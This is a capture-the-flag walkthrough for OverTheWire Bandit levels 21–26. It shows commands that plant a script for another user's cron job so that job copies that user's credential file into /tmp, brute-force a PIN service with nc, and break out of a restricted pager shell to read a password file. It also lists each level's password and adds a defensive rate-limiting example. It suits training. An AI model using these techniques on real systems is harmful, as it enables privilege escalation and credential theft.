Bandit Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
Key concepts:
cron basics. Reference: https://baike.so.com/doc/1746392-1846378.html
Steps:
cat /etc/cron.d/cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Password: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Bandit Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Key concepts:
Reading and understanding shell scripts
Steps:
echo I am user bandit23 | md5sum | cut -d ' ' -f 1
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Bandit Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Key concepts:
Reading and writing shell scripts.
Steps:
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
Write the shell script:
mkdir /tmp/bandit23/
cd /tmp/bandit23/
vi 1.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/bandit23/pass
chmod 777 1.sh
touch pass
chmod 777 pass
cp 1.sh /var/spool/bandit24/
Then just wait in the current directory.
Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
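Key concepts:
Brute forcing
Steps:
1. First connect with nc to see the input format the daemon expects; the shell script that builds the password dictionary is based on it.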
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
^C
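2. Write a shell script to build the password dictionary
#!/bin/bash
# One candidate per line: the bandit24 password, a space, a zero-padded 4-digit pin.
for ((i=0;i<10000;i++));
do
    printf '%s %04d\n' "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" "$i" >>pass
done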
3. Brute force:
nc localhost 30002 <pass
Password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
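The brute force above works because one connection accepts an unlimited number of guesses. As a defensive counterpoint, here is an added example (not part of the original write-up and not the level's real daemon): a checker that caps failed guesses per connection. MAX_TRIES, EXPECTED_PASS, EXPECTED_PIN and all function names are assumptions made up for illustration.

```shell
#!/bin/sh
# Added example, not the level's real daemon. All values are constructed.
MAX_TRIES=3                        # assumption: failed guesses allowed per connection
EXPECTED_PASS="example-password"   # constructed placeholder
EXPECTED_PIN="4821"                # constructed placeholder

# Reads "password pin" lines from stdin, the way a client feeding a dictionary
# into one connection would send them. Returns 0 on a correct guess, 1 if the
# input ends first, 2 once the per-connection cap is reached.
check_pins() {
    tries=0
    while read -r pass pin rest; do
        ok=no
        case "$pin" in
            # Only a bare four-digit pin with nothing after it is considered.
            [0-9][0-9][0-9][0-9])
                if [ -z "$rest" ] && [ "$pass" = "$EXPECTED_PASS" ] \
                   && [ "$pin" = "$EXPECTED_PIN" ]; then
                    ok=yes
                fi ;;
        esac
        if [ "$ok" = yes ]; then
            echo "Correct!"
            return 0
        fi
        tries=$((tries + 1))
        echo "Wrong! ($tries/$MAX_TRIES)"
        if [ "$tries" -ge "$MAX_TRIES" ]; then
            echo "Too many failed attempts, closing connection."
            return 2
        fi
    done
    return 1
}

# Every candidate pin from 0000 to 9999, one guess per line.
make_dictionary() {
    i=0
    while [ "$i" -lt 10000 ]; do
        printf '%s %04d\n' "$EXPECTED_PASS" "$i"
        i=$((i + 1))
    done
}

# How many guesses the checker answers before it stops reading the dictionary.
guesses_answered() {
    check_pins <<EOF | grep -c '^Wrong!'
$(make_dictionary)
EOF
}
```

With the cap in place, a 10000-line dictionary gets three answers per connection instead of one guaranteed hit; a real service would also track failures per client across connections.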
Bandit Level 25 → Level 26
Level Goal
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
Key concepts:
Steps:
bandit25@bandit:~$ cat /etc/passwd| grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
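Shrink the local shell (terminal window) to fewer than 6 lines, then log in.
After logging in, press v in the blocked more pager to open the vi editing screen, then press : to enter command-line mode and run the command r /etc/bandit_pass/bandit26 to get the password.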